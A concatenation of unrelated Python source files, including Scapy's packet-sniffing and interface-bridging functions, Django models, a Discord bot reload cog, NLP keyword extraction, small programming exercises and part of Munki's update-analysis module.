sniff_sockets[L2socket(type=ETH_P_ALL, iface=iface,
**karg)] = iface
# Get select information from the sockets
_main_socket = next(iter(sniff_sockets))
select_func = _main_socket.select
nonblocking_socket = _main_socket.nonblocking_socket
# We check that all sockets use the same select(), or raise a warning
if not all(select_func == sock.select for sock in sniff_sockets):
warning("Warning: inconsistent socket types ! "
"The used select function "
"will be the one of the first socket")
if not nonblocking_socket:
# select is blocking: Add special control socket
from scapy.automaton import ObjectPipe
close_pipe = ObjectPipe()
sniff_sockets[close_pipe] = "control_socket"
def stop_cb():
# type: () -> None
if self.running:
close_pipe.send(None)
self.continue_sniff = False
self.stop_cb = stop_cb
else:
# select is non blocking
def stop_cb():
# type: () -> None
self.continue_sniff = False
self.stop_cb = stop_cb
close_pipe = None
try:
if started_callback:
started_callback()
self.continue_sniff = True
# Start timeout
if timeout is not None:
stoptime = time.time() + timeout
remain = None
while sniff_sockets and self.continue_sniff:
if timeout is not None:
remain = stoptime - time.time()
if remain <= 0:
break
sockets = select_func(list(sniff_sockets.keys()), remain)
dead_sockets = []
for s in sockets:
if s is close_pipe:
break
try:
p = s.recv()
except EOFError:
# End of stream
try:
s.close()
except Exception:
pass
dead_sockets.append(s)
continue
except Exception as ex:
msg = " It was closed."
try:
# Make sure it's closed
s.close()
except Exception as ex2:
msg = " close() failed with '%s'" % ex2
warning(
"Socket %s failed with '%s'." % (s, ex) + msg
)
dead_sockets.append(s)
if conf.debug_dissector >= 2:
raise
continue
if p is None:
continue
if lfilter and not lfilter(p):
continue
p.sniffed_on = sniff_sockets[s]
# on_packet_received handles the prn/storage
session.on_packet_received(p)
# check
if (stop_filter and stop_filter(p)) or \
(0 < count <= session.count):
self.continue_sniff = False
break
# Removed dead sockets
for s in dead_sockets:
del sniff_sockets[s]
except KeyboardInterrupt:
pass
self.running = False
if opened_socket is None:
for s in sniff_sockets:
s.close()
elif close_pipe:
close_pipe.close()
self.results = session.toPacketList()
def start(self):
# type: () -> None
"""Starts AsyncSniffer in async mode"""
self._setup_thread()
if self.thread:
self.thread.start()
def stop(self, join=True):
# type: (bool) -> Optional[PacketList]
"""Stops AsyncSniffer if not in async mode"""
if self.running:
try:
self.stop_cb()
except AttributeError:
raise Scapy_Exception(
"Unsupported (offline or unsupported socket)"
)
if join:
self.join()
return self.results
return None
else:
raise Scapy_Exception("Not started !")
def join(self, *args, **kwargs):
# type: (*Any, **Any) -> None
if self.thread:
self.thread.join(*args, **kwargs)
@conf.commands.register
def sniff(*args, **kwargs):
# type: (*Any, **Any) -> PacketList
sniffer = AsyncSniffer()
sniffer._run(*args, **kwargs)
return cast(PacketList, sniffer.results)
sniff.__doc__ = AsyncSniffer.__doc__
@conf.commands.register
def bridge_and_sniff(if1, # type: _GlobInterfaceType
if2, # type: _GlobInterfaceType
xfrm12=None, # type: Optional[Callable[[Packet], Union[Packet, bool]]] # noqa: E501
xfrm21=None, # type: Optional[Callable[[Packet], Union[Packet, bool]]] # noqa: E501
prn=None, # type: Optional[Callable[[Packet], Any]]
L2socket=None, # type: Optional[Type[SuperSocket]]
*args, # type: Any
**kargs # type: Any
):
# type: (...) -> PacketList
"""Forward traffic between interfaces if1 and if2, sniff and return
the exchanged packets.
:param if1: the interfaces to use (interface names or opened sockets).
:param if2:
:param xfrm12: a function to call when forwarding a packet from if1 to
if2. If it returns True, the packet is forwarded as it. If it
returns False or None, the packet is discarded. If it returns a
packet, this packet is forwarded instead of the original packet
one.
:param xfrm21: same as xfrm12 for packets forwarded from if2 to if1.
The other arguments are the same than for the function sniff(),
except for offline, opened_socket and iface that are ignored.
See help(sniff) for more.
"""
for arg in ['opened_socket', 'offline', 'iface']:
if arg in kargs:
log_runtime.warning("Argument %s cannot be used in "
"bridge_and_sniff() -- ignoring it.", arg)
del kargs[arg]
def _init_socket(iface, # type: _GlobInterfaceType
count, # type: int
L2socket=L2socket # type: Optional[Type[SuperSocket]]
):
# type: (...) -> Tuple[SuperSocket, _GlobInterfaceType]
if isinstance(iface, SuperSocket):
return iface, "iface%d" % count
else:
if not L2socket:
iface = resolve_iface(iface or conf.iface)
L2socket = iface.l2socket()
return L2socket(iface=iface), iface
sckt1, if1 = _init_socket(if1, 1)
sckt2, if2 = _init_socket(if2, 2)
peers = {if1: sckt2, if2: sckt1}
xfrms = {}
if xfrm12 is not None:
xfrms[if1] = xfrm12
if xfrm21 is not None:
xfrms[if2] = xfrm21
def prn_send(pkt):
# type: (Packet) -> None
try:
sendsock = peers[pkt.sniffed_on or ""]
except KeyError:
return
if pkt.sniffed_on in xfrms:
try:
_newpkt = xfrms[pkt.sniffed_on](pkt)
except Exception:
log_runtime.warning(
'Exception in transformation function for packet [%s] '
'received on %s -- dropping',
pkt.summary(), pkt.sniffed_on, exc_info=True
)
return
else:
if isinstance(_newpkt, bool):
if not _newpkt:
return
newpkt = pkt
else:
newpkt = _newpkt
else:
newpkt = pkt
try:
sendsock.send(newpkt)
except Exception:
log_runtime.warning('Cannot forward packet [%s] received on %s',
pkt.summary(), pkt.sniffed_on, exc_info=True)
if prn is None:
prn = prn_send
else:
prn_orig = prn
def prn(pkt):
# type: (Packet) -> Any
prn_send(pkt)
return prn_orig(pkt)
return sniff(opened_socket={sckt1: if1, sckt2: if2}, prn=prn,
*args, **kargs)
@conf.commands.register
def tshark(*args, **kargs):
# type: (Any, Any) -> None
"""Sniff packets and print them calling pkt.summary().
This tries to replicate what text-wireshark (tshark) would look like"""
if 'iface' in kargs:
iface = kargs.get('iface')
elif 'opened_socket' in kargs:
iface = cast(SuperSocket, kargs.get('opened_socket')).iface
else:
iface = conf.iface
print("Capturing on '%s'" % iface)
# This should be a nonlocal variable, using a mutable object
# for Python 2 compatibility
i = [0]
def _cb(pkt):
# type: (Packet) -> None
print("%5d\t%s" % (i[0], pkt.summary()))
i[0] += 1
sniff(prn=_cb, store=False, *args, **kargs)
print("\n%d packet%s captured" % (i[0], 's' if i[0] > 1 else ''))
|
# -*- coding: utf-8 -*-
#########################################################################
#
# Copyright (C) 2020: TelelBirds
#
#
#########################################################################
from __future__ import unicode_literals
import os
import datetime
from django.core.validators import MaxValueValidator, MinValueValidator
from django.db import models
from django.db.models import ImageField
from django.utils.safestring import mark_safe
from django.template.defaultfilters import truncatechars, slugify # or truncatewords
from django.contrib.gis.db import models as gismodels
from imagekit.models import ProcessedImageField
from imagekit.processors import ResizeToFit
from telelbirds import settings
from apps.breeders.models import Breeders, Breed
class Customer(models.Model):
"""
Customer Model
"""
id = models.AutoField(primary_key=True)
first_name=models.CharField(null=True,blank=True,max_length=50)
last_name=models.CharField(null=True,blank=True,max_length=50)
full_name=models.CharField(null=True,blank=True,max_length=50)
photo = ProcessedImageField(upload_to='customer_photos',null=True,blank=True, processors=[ResizeToFit(1280)], format='JPEG', options={'quality': 70})
email=models.EmailField(null=True,blank=True,max_length=50)
phone=models.CharField(null=True,blank=True,max_length=15)
address=models.CharField(null=True,blank=True,max_length=50)
location=gismodels.PointField(
srid=4326,
null=True,
spatial_index=True,
geography=True,
blank=True) # Point
latitude = models.FloatField(null=True,blank=True)
longitude = models.FloatField(null=True,blank=True)
customertype=models.CharField(null=True,blank=True,max_length=50)
notification_sms=models.BooleanField(null=True,blank=True,max_length=50)
notification_sms=models.BooleanField(null=True,blank=True,max_length=50)
delivery=models.BooleanField(null=True,blank=True,max_length=50)
followup=models.BooleanField(null=True,blank=True,max_length=50)
created = models.DateTimeField(auto_now_add=True)
class Meta:
ordering = ['created']
db_table = "customers"
verbose_name = 'Customer'
verbose_name_plural = "Customers"
managed = True
def save(self, *args, **kwargs):
self.full_name = self.first_name + " " + self.last_name
super(Customer, self).save(*args, **kwargs)
def __str__(self):
return self.last_name + ", " + self.first_name
def get_absolute_url(self):
return '/customer/{}'.format(self.full_name)
class Eggs(models.Model):
"""
Eggs Model
"""
id = models.AutoField(primary_key=True)
batchnumber = models.CharField(null=True,blank=True,max_length=50)
customer=models.ForeignKey(Customer,
related_name="eggs_customer", blank=True, null=True,
on_delete=models.SET_NULL)
breed=models.ForeignKey(Breed,
related_name="eggs_breed", blank=True, null=True,
on_delete=models.SET_NULL)
customercode = models.CharField(null=True,blank=True,max_length=50)
photo = ProcessedImageField(upload_to='eggs_photos',null=True,blank=True, processors=[ResizeToFit(1280)], format='JPEG', options={'quality': 70})
brought = models.IntegerField(null=True,blank=True)
returned = models.IntegerField(null=True,blank=True)
received=models.IntegerField(null=True,blank=True,max_length=50)
created = models.DateTimeField(auto_now_add=True)
class Meta:
ordering = ['created']
db_table = "eggs"
verbose_name = 'Egg'
verbose_name_plural = "Eggs"
managed = True
def save(self, *args, **kwargs):
self.received = self.brought - self.returned
super(Eggs, self).save(*args, **kwargs)
def __str__(self):
return self.batchnumber
def get_absolute_url(self):
return '/customer_eggs/{}'.format(self.batchnumber)
class CustomerRequest(models.Model):
"""
CustomerRequest Model
"""
id = models.AutoField(primary_key=True)
requestcode=models.CharField(null=True,blank=True,max_length=50)
eggs=models.ForeignKey(Eggs,
related_name="customerrequest_eggs", blank=True, null=True,
on_delete=models.SET_NULL)
created = models.DateTimeField(auto_now_add=True)
class Meta:
ordering = ['created']
db_table = "CustomerRequests"
verbose_name = 'CustomerRequest'
verbose_name_plural = "CustomerRequests"
managed = True
def get_absolute_url(self):
return '/customer_request/{}'.format(self.requestcode) |
import unittest
from selenium import webdriver
class NewVisitorTest(unittest.TestCase):
def setUp(self):
self.browser = webdriver.Firefox()
def tearDown(self):
self.browser.quit()
def test_user_can_login(self):
# Clive knows of a website which contains lots of torrent that he wants to try out
# He navigates to it in his browser
self.browser.get('http://127.0.0.1:8000')
# He notices that the browser title says he's made it to the right site
self.assertIn('Forked Tongue', self.browser.title)
# He is asked to log into the website, He notices this is also in the page title.
self.assertIn('login', self.browser.title)
# He types in his login details incorrectly the first time.
# He notices he is back on the login page, with a message stating his credentials were incorrect.
# He trys again, and this time successfully logs in.
# He can tell he's now logged in from the title bar and the user interface displaying his name.
|
import csv
import sys
from entities.Location import Location
from structures.Graph import Graph
from .Logger import Logger
sys.path.append("..")
class RouteLoader:
"""Loads the distance table from a file."""
def __init__(self, filename):
super().__init__()
self.filename = filename
self.packages = None
self.graph = None
def load(self):
"""Loads the contents of the file passed to constructor."""
with open(self.filename, mode='r') as csv_file:
reader = csv.DictReader(csv_file)
line_count = 0
# Once we know the number of columns, we can create the graph
self.graph = Graph(len(reader.fieldnames) -
2) # First two columns aren't relevant
# Time complexity is O(N^2)
for row in reader:
# Print the headers
if line_count == 0:
Logger.log(Logger.LogLevel.INFORMATION,
f"Loading destinations from {self.filename}")
Logger.log(Logger.LogLevel.DEBUG,
"Columns: " + ", ".join(row))
line_count += 1
# This assumes the CSV file is in matrix format,
# and the rows are in the same order as the columns
Logger.log(
Logger.LogLevel.DEBUG,
f"Row {line_count}: Location {row[reader.fieldnames[0]]}")
# Each row will be processed one column at a time, per edge
# First, get the row name, which will remain constant for each outer iteration
row_name = Location(row[reader.fieldnames[1]].strip())
# Use second column for the vertex name, so it will match up to the packages
self.graph.add_vertex(row_name)
# While we are loading, we don't have all the vertex names yet,
# So load the row by name, but the column by index
# Time complexity is O(N)
for v in range(2, len(reader.fieldnames)):
col_name = reader.fieldnames[v]
weight = row[col_name]
try:
# If the weight wasn't a number (empty), then ignore it
# It will be filled in later if the graph is undirected
weight = float(weight)
self.graph.add_edge(row_name, v - 2, weight)
except ValueError:
pass
Logger.log(Logger.LogLevel.INFORMATION,
f"Loaded {line_count} destinations")
|
number = str(input())
# разделение числа на две части
first_half = int(number) // 1000
second_half = int(number) % 1000
# цифры первой половины
first = first_half // 100
second = first_half % 100 // 10
third = first_half % 100 % 10
# цифры второй половины
fourth = second_half // 100
fifth = second_half % 100 // 10
sixth = second_half % 100 % 10
if first + second + third == fourth + fifth + sixth:
print("Счастливый")
else:
print("Обычный")
|
from discord.ext import commands
from Bot.utils.staff.staff_checks import *
from main import main_db
from pathlib import Path
from config import prefixes
users = main_db["users"]
blacklisted_files = ["shutdown", "start", "reload"]
class devtools(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.group()
async def reload(self, ctx):
if ctx.invoked_subcommand is None:
await ctx.send("Available Subcommands:\n"
f"{prefixes[0]}reload all - Reloads all files\n"
f"{prefixes[0]}reload folder <folder_name> - Reloads all cogs in the specified folder.\n"
f"{prefixes[0]}reload folders - Displays a list of the bot's folders.")
@reload.command()
@is_dev()
async def all(self, ctx):
for ext in Path().glob("Bot/cogs/*/*.py"):
try:
self.bot.unload_extension(".".join(part for part in ext.parts)[:-len(ext.suffix)])
except Exception:
print(f"Could not load extension {ext}")
count = 0
for ext in Path().glob("Bot/cogs/*/*.py"):
try:
self.bot.load_extension(".".join(part for part in ext.parts)[:-len(ext.suffix)])
count += 1
except Exception:
print(f"Could not load extension {ext}")
await ctx.send(f"Success! Files Reloaded: {count}")
@reload.command()
@is_dev()
async def folders(self, ctx):
string = "Folders:\n"
for folder in Path().glob(f"Bot/cogs/*"):
try:
folder_name = f"{list(folder.parts)[2]}\n"
string += folder_name
except:
print(f"{folder} was unable to be added to the string.")
continue
await ctx.send(string)
@reload.command()
@is_dev()
async def folder(self, ctx, folder):
for extension in Path().glob(f"Bot/cogs/{folder}/*.py"):
try:
self.bot.unload_extension(".".join(part for part in extension.parts)[:-len(extension.suffix)])
except:
print(f"Could not load extension {extension}")
count = 0
for extension in Path().glob(f"Bot/cogs/{folder}/*.py"):
try:
self.bot.load_extension(".".join(part for part in extension.parts)[:-len(extension.suffix)])
count += 1
except:
print(f"Could not load extension {extension}")
await ctx.send(f"Success! Files Reloaded: {count}")
def setup(bot):
bot.add_cog(devtools(bot))
|
'''Crie um programa que leia o ano de nascimento de sete pessoas.
No final, mostre quantas pessoas ainda não atingiram a maioridade e quantas já são maiores.'''
from datetime import date
totmaior = 0
totmenor = 0
for c in range(1, 8):
nasc = int(input('Digite o ano de nascimento da {}º pessoa: '.format(c)))
idade = date.today().year - nasc
if idade >= 21:
totmaior += 1
#print('A {}º pessoa já é maior de idade.'.format(c))
else:
totmenor += 1
#print('A {}º pessoa NÃO É MAIOR DE IDADE.'.format(c))
print('São {} pessoas maior de idade e {} menor de idade.'.format(totmaior, totmenor))
|
""" wordprocessing.py """
import string
from collections import OrderedDict, Counter
import sys
import re
import spacy
import numpy as np
def keyword_extractor(data: list) -> list:
"""
Function to extract keywords from the headers and paragraphs of slides
:param data: The list of dictionaries of the form
:type: [{"Header":"", "Paragraph":"", slide:int}]
:return: The list of dictionaries with keywords extracted of the form
:rtype: [{"Header":"",
"Paragraph":"",
"Header_keywords": [],
"Paragraph_keywords": [],
slide:int}]
"""
try:
nlp = spacy.load("en_core_web_lg")
except OSError as error:
print("Please make sure you have Spacy Word Model en_core_web_lg downloaded.")
print(error)
sys.exit()
pos_tag = ["NOUN"]
dep_tag = ["nsubj"]
for slide in data:
doc_header = nlp(slide["Header"].lower())
doc_paragraph = nlp(slide["Paragraph"].lower())
header_keywords = []
paragraph_keywords = []
for token in doc_header:
if token.text in nlp.Defaults.stop_words or token.is_punct:
continue
if token.pos_ in pos_tag or token.dep_ in dep_tag:
word = re.sub(r"[^0-9a-zA-Z]+", " ", token.text)
word = word.strip()
if len(word) >= 3:
header_keywords.append(word)
for token in doc_paragraph:
if token.text in nlp.Defaults.stop_words or token.is_punct:
continue
if token.pos_ in pos_tag or token.dep_ in dep_tag:
word = re.sub(r"[^a-zA-Z]+", " ", token.text)
word = word.strip()
if len(word) >= 3:
paragraph_keywords.append(word)
slide["Header_keywords"] = header_keywords
slide["Paragraph_keywords"] = paragraph_keywords
return data
def duplicate_word_removal(data: list) -> list:
"""
Removes duplicate words
:param data: The list of dictionaries of the form
:type: [{"Header":"", "Header_keywords": [], "Paragraph_keywords": [], slides:[int]}]
:return: The list of dictionaries with duplicate keywords removed of the form
:rtype: [{"Header":"", "Header_keywords": [], "Paragraph_keywords": [], slides:[int]}]
"""
for dictionary in data:
ordered_headers = list(OrderedDict.fromkeys(dictionary['Header_keywords']))
dictionary['Header_keywords'] = ordered_headers
ordered_paragraph = list(OrderedDict.fromkeys(dictionary['Paragraph_keywords']))
dictionary['Paragraph_keywords'] = ordered_paragraph
return data
def merge_slide_with_same_headers(data: list) -> list:
"""
Function to merge slides with the same header.
:param data: The list of dictionaries of the form
:type: [{"Header":"",
"Paragraph":"",
"Header_keywords": [],
"Paragraph_keywords": [],
slide:int}]
:return: The list of dictionaries where slides containing the same header are merged
:rtype: [{"Header":"", "Header_keywords": [], "Paragraph_keywords": [], slides:[int]}]
"""
merged = []
headers = []
for slide in data:
if slide["Header"] not in headers:
headers.append(slide["Header"])
paragraph_keywords = []
slide_numbers = []
for data_1 in [data_2 for data_2 in data if data_2["Header"] == slide["Header"]]:
paragraph_keywords += data_1["Paragraph_keywords"]
slide_numbers.append(data_1["slide"])
merged.append({"Header": slide["Header"], "Header_keywords": slide["Header_keywords"],
"Paragraph_keywords": paragraph_keywords, "slides": slide_numbers})
return merged
def merge_slide_with_same_slide_number(data: list) -> list:
"""
Function to merge slides with the same slide number into a single one.
:param data: The list of dictionaries of the form
:type: [{"Header":"",
"Paragraph":"",
"Header_keywords": [],
"Paragraph_keywords": [],
slide:int}]
:return: The list of dictionaries where slides containing the same slide number are merged
:rtype: [{"Header":"", "Header_keywords": [], "Paragraph_keywords": [], slide:int}]
"""
merged = []
slide_number = []
for slide in data:
if slide["slide"] not in slide_number:
slide_number.append(slide["slide"])
header_keywords = []
paragraph_keywords = []
for data_1 in [data_2 for data_2 in data if data_2["slide"] == slide["slide"]]:
header_keywords += data_1["Header_keywords"]
paragraph_keywords += data_1["Paragraph_keywords"]
merged.append({"Header": slide["Header"], "Header_keywords": header_keywords,
"Paragraph_keywords": paragraph_keywords,
"slide": slide["slide"]})
return merged
def construct_search_query(data: list) -> list:
"""
Constructs a search query given a PDF data
:param data: The list of data
:type: list
:return: List of words to search
:rtype: list
"""
header_keywords = []
paragraph_keywords = []
for item in data:
header_keywords += item["Header_keywords"] * len(item["slides"])
paragraph_keywords += item["Paragraph_keywords"] * len(item["slides"])
header_counts = Counter(header_keywords)
paragraph_counts = Counter(paragraph_keywords)
header_mean = np.array(list(header_counts.values())).mean()
paragraph_mean = np.array(list(paragraph_counts.values())).mean()
header_search = []
paragraph_search = []
for key, value in header_counts.items():
if value > header_mean:
header_search.append(key)
for key, value in paragraph_counts.items():
if value > paragraph_mean:
paragraph_search.append(key)
return header_search + paragraph_search
def extract_noun_chunks(data: list) -> list:
"""
Extracts nouns using Spacy
:param data: list of PDF data
:type: list
:return: list of data with nouns extracted
:rtype: list
"""
try:
nlp = spacy.load("en_core_web_lg")
except OSError as error:
print("Please make sure you have Spacy Word Model en_core_web_lg downloaded.")
print(error)
sys.exit()
for slide in data:
doc_header_noun_chunks = nlp(slide["Header"].lower()).noun_chunks
doc_paragraph_noun_chunks = nlp(slide["Paragraph"].lower()).noun_chunks
header_keywords = []
paragraph_keywords = []
for token in doc_header_noun_chunks:
processed_words = []
words = token.text.split()
for word in words:
word = re.sub(r"[^a-zA-Z]+", "", word).strip()
if word in nlp.Defaults.stop_words or word in string.punctuation:
continue
if len(word) >= 3:
processed_words.append(word)
if len(processed_words) >= 2:
header_keywords.append(" ".join(processed_words))
for token in doc_paragraph_noun_chunks:
processed_words = []
words = token.text.split()
for word in words:
word = re.sub(r"[^a-zA-Z]+", "", word).strip()
if word in nlp.Defaults.stop_words or word in string.punctuation:
continue
if len(word) >= 3:
processed_words.append(word)
if len(processed_words) >= 2:
paragraph_keywords.append(" ".join(processed_words))
slide["Header_keywords"] = header_keywords
slide["Paragraph_keywords"] = paragraph_keywords
return data
if __name__ == "__main__":
main_data = [{"Header": "Dimensionality Reduction PCA",
"Paragraph": "Dimensionality Reduction Purposes: – Avoid curse of dimensionality \
– Reduce amount of time and memory required by data mining algorithms Allow data to be more easily \
visualized May help to eliminate irrelevant features or reduce noise Techniques Principal Component Analysis \
Singular Value Decomposition supervised and non-linear techniques",
"slide": 8},
{"Header": "Gratuitous ARP",
"Paragraph": "Every machine broadcasts its mapping when it boots to"
" update ARP caches in other "
"machines \n "
"Example: A sends an ARP Request with its own IP"
" address as the target IP address \n "
"Sender MAC=MACA, Sender IP=IPA n Target MAC=??, Target IP=IPA \n "
"What if a reply is received?",
"slide": 9},
{"Header": "Dimensionality Reduction PCA",
"Paragraph": "Goal is to find a projection that captures"
"the largest amount of variation in data \
Find the eigenvectors of the covariance matrix The eigenvectors define the new space",
"slide": 9}]
keyword_data = keyword_extractor(main_data)
print(keyword_data)
keyword_data = merge_slide_with_same_slide_number(keyword_data)
print(keyword_data)
keyword_data = merge_slide_with_same_headers(keyword_data)
print(keyword_data)
keyword_data = duplicate_word_removal(keyword_data)
print(keyword_data)
|
from setuptools import setup
setup(name='ascii_enine',
version='0.0.1',
description='Create ASCII-based programs',
url='http://github.com/carlosmaniero/ascii-engine',
author='Carlos Maniero',
author_email='carlosmaniero@gmail.com',
license='MIT',
packages=['ascii_engine'],
install_requires=[],
zip_safe=False)
|
"""
Big data processing (enhanced version).
Author: lj1218
Date : 2018-12-09
===========================================
条件:
1、x,y 从B列取值;z从A列取值;
2、z > y > x.
求解:
1、精确到小数点后2位,求 (z-y)/(y-x);
2、出现频率最高的比值,列出所对应的x,y,z组合.
===========================================
"""
import os
import sys
import time
from functools import partial, wraps
import numpy as np
import pandas as pd
from tool import Timer
def get_time():
"""Get current system time."""
return time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
def print_msg(msg):
"""Print message."""
print('[{}] '.format(get_time()) + msg)
sys.stdout.flush() # flush buffers
def get_lines_number(filename):
"""Get number of lines in text file."""
number = 0
with open(filename) as f:
for _ in f:
number += 1
return number
def gen_org_data(out_file, out_index='x,y,z',
xlsx_file='data.xlsx', print_n=10000):
"""Generate original data for calculation."""
xlsx = pd.ExcelFile(xlsx_file)
df = pd.read_excel(xlsx, 'Sheet1')
z_set = df['z'].dropna().sort_values()
x_y_set = df['y,x'].dropna().sort_values()
print_msg('start generating original data...')
timer = Timer()
with open(out_file, 'w', encoding='utf-8') as f:
__gen_org_data(z_set, x_y_set, f, out_index, print_n)
print_msg('finish generating original data ({}s)'.format(timer.elapse(2)))
def __gen_org_data(z_set, x_y_set, fh, out_index, print_n):
fh.write(out_index + '\n')
count = 0
for z in z_set:
for y in x_y_set:
if y >= z:
break
for x in x_y_set:
if x >= y:
break
count += 1
fh.write('{},{},{}\n'.format(x, y, int(z)))
if count % print_n == 0:
print_msg('count={}'.format(count))
print_msg('count={}'.format(count))
print_msg('total={}'.format(len(x_y_set) * len(x_y_set) * len(z_set)))
def profiled(func=None, *, total=None, print_n=10, name='n'):
"""Decorate function call times and print some message."""
if func is None:
return partial(profiled, total=total, print_n=print_n, name=name)
n_calls = 0
@wraps(func)
def wrapper(*args, **kwargs):
nonlocal n_calls
n_calls += 1
if n_calls % print_n == 0:
if total is None:
print_msg('{}={}'.format(name, n_calls))
else:
print_msg('{}={} ({})'.format(
name, n_calls, round(n_calls/total, 3))
)
return func(*args, *kwargs)
wrapper.n_calls = lambda: n_calls
return wrapper
def do_calc(filename, result_col='ratio', ndigits=2, print_n=100000):
"""Do calculation."""
def get_row_number():
print_msg('start counting data rows...')
rows = get_lines_number(filename) - 1
print_msg('finish counting data rows ({}s)'.format(timer.elapse(2)))
return rows
timer = Timer()
row_number = get_row_number()
print_msg('total rows = {}'.format(row_number))
@profiled(total=row_number, print_n=print_n, name='calc_counter')
def calc(s):
x = s['x']
y = s['y']
z = s['z']
return round((z - y) / (y - x), ndigits)
print_msg('start calculation...')
timer.reset()
ratios = []
with open(filename) as f:
for line in f:
line = line.split(',')
try:
data = {
'x': np.float64(line[0]),
'y': np.float64(line[1]),
'z': np.float64(line[2]),
}
except ValueError:
continue
ratios.append(calc(data))
print_msg('finish calculation ({}s)'.format(timer.elapse(2)))
print_msg('start loading org data...')
timer.reset()
df = pd.read_csv(filename)
print_msg('finish loading org data ({}s)'.format(timer.elapse(2)))
print_msg('start appending result column...')
timer.reset()
df[result_col] = ratios
print_msg('finish appending result column ({}s)'.format(timer.elapse(2)))
return df
def find_max_occur(groups, print_n=10000):
"""Find max occurred results from groups."""
@profiled(total=len(groups), print_n=print_n, name='find_max_counter')
def _find_max_occur(grp, max_occur, rs):
number = len(grp[1])
if number > max_occur:
rs = [grp]
max_occur = number
elif number == max_occur:
rs.append(grp)
return rs, max_occur
max_ = 0
result = []
print_msg('start finding max occur...')
print_msg('total groups = {}'.format(len(groups)))
timer = Timer()
for group in groups:
result, max_ = _find_max_occur(group, max_, result)
print_msg('finish finding max occur ({}s)'.format(timer.elapse(2)))
return result
def save_result(rs, out_dir, print_n=10):
"""Save result."""
@profiled(total=len(rs), print_n=print_n, name='save_rs_counter')
def _save_result(r, directory):
filename = os.path.join(directory, 'result_{}.csv'.format(r[0]))
df = r[1]
del df['ratio']
df.to_csv(filename, index=False)
print_msg('start saving result...')
print_msg('total results = {}'.format(len(rs)))
timer = Timer()
for x in rs:
_save_result(x, out_dir)
print_msg('finish saving result ({}s)'.format(timer.elapse(2)))
def main():
"""Entry."""
src_dir = 'data'
out_dir = 'result'
result_dir = os.path.join(out_dir, 'max_occur')
src_file = os.path.join(src_dir, 'data.xlsx')
org_data_file = os.path.join(src_dir, 'org_data.csv')
sorted_data_file = os.path.join(out_dir, 'data_sorted.csv')
save_data_sorted = False
print_msg('start running...')
main_timer = Timer()
if not os.path.exists(org_data_file):
gen_org_data(out_file=org_data_file,
xlsx_file=src_file, print_n=100000)
df = do_calc(org_data_file, ndigits=2, print_n=100000)
print_msg('start sorting values...')
timer = Timer()
data_sorted = df.sort_values(by='ratio')
print_msg('finish sorting values ({}s)'.format(timer.elapse(2)))
if save_data_sorted:
print_msg('start saving sorted data to file...')
timer.reset()
data_sorted.to_csv(sorted_data_file, index=False)
print_msg('finish saving sorted data to file ({}s)'.format(
timer.elapse(2)))
print_msg('start grouping data...')
timer.reset()
grouped = data_sorted.groupby('ratio')
print_msg('finish grouping data ({}s)'.format(timer.elapse(2)))
result = find_max_occur(grouped, print_n=10000)
save_result(result, result_dir, print_n=10)
print_msg('finish running ({}s)'.format(main_timer.elapse(2)))
if __name__ == '__main__':
main()
|
"""
StarryPy species whitelist plugin
Prevents players with unknown species from joining the server.
This is necessary due to a year+ old "bug" detailed here:
https://community.playstarbound.com/threads/119569/
Original Authors: GermaniumSystem
"""
from base_plugin import BasePlugin
from data_parser import ConnectFailure
from packets import packets
from pparser import build_packet
class SpeciesWhitelist(BasePlugin):
name = "species_whitelist"
depends = ["player_manager"]
default_config = {"enabled": False,
"allowed_species": [
"apex",
"avian",
"glitch",
"floran",
"human",
"hylotl",
"penguin",
"novakid"
]}
def activate(self):
super().activate()
self.enabled = self.config.get_plugin_config(self.name)["enabled"]
self.allowed_species = self.config.get_plugin_config(self.name)["allowed_species"]
def on_client_connect(self, data, connection):
if not self.enabled:
return True
species = data['parsed']['species']
if species not in self.allowed_species:
self.logger.warn("Aborting connection - player's species ({}) "
"is not in whitelist.".format(species))
rejection_packet = build_packet(packets['connect_failure'],
ConnectFailure.build(dict(reason="^red;Connection "
"aborted!\n\n^orange;Your species ({}) is not "
"allowed on this server.\n^green;Please use a "
"different character.".format(species))))
yield from connection.raw_write(rejection_packet)
connection.die()
return False
return True
|
# encoding: utf-8
#
# Copyright 2009-2017 Greg Neagle.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
updatecheck.analyze
Created by Greg Neagle on 2017-01-10.
"""
import datetime
import os
from . import catalogs
from . import compare
from . import download
from . import installationstate
from . import manifestutils
from . import unused_software
from .. import display
from .. import fetch
from .. import info
from .. import installer
from .. import munkilog
from .. import processes
def item_in_installinfo(item_pl, thelist, vers=''):
"""Determines if an item is in a list of processed items.
Returns True if the item has already been processed (it's in the list)
and, optionally, the version is the same or greater.
"""
for listitem in thelist:
try:
if listitem['name'] == item_pl['name']:
if not vers:
return True
#if the version already installed or processed to be
#installed is the same or greater, then we're good.
if listitem.get('installed') and (compare.compare_versions(
listitem.get('installed_version'), vers) in (1, 2)):
return True
if (compare.compare_versions(
listitem.get('version_to_install'), vers) in (1, 2)):
return True
except KeyError:
# item is missing 'name', so doesn't match
pass
return False
def is_apple_item(item_pl):
"""Returns True if the item to be installed or removed appears to be from
Apple. If we are installing or removing any Apple items in a check/install
cycle, we skip checking/installing Apple updates from an Apple Software
Update server so we don't stomp on each other"""
# check receipts
for receipt in item_pl.get('receipts', []):
if receipt.get('packageid', '').startswith('com.apple.'):
return True
# check installs items
for install_item in item_pl.get('installs', []):
if install_item.get('CFBundleIdentifier', '').startswith('com.apple.'):
return True
# if we get here, no receipts or installs items have Apple
# identifiers
return False
def process_managed_update(manifestitem, cataloglist, installinfo):
"""Process a managed_updates item to see if it is installed, and if so,
if it needs an update.
"""
manifestitemname = os.path.split(manifestitem)[1]
display.display_debug1(
'* Processing manifest item %s for update', manifestitemname)
# check to see if item is already in the update list:
if manifestitemname in installinfo['managed_updates']:
display.display_debug1(
'%s has already been processed for update.', manifestitemname)
return
# check to see if item is already in the installlist:
if manifestitemname in installinfo['processed_installs']:
display.display_debug1(
'%s has already been processed for install.', manifestitemname)
return
# check to see if item is already in the removallist:
if manifestitemname in installinfo['processed_uninstalls']:
display.display_debug1(
'%s has already been processed for uninstall.', manifestitemname)
return
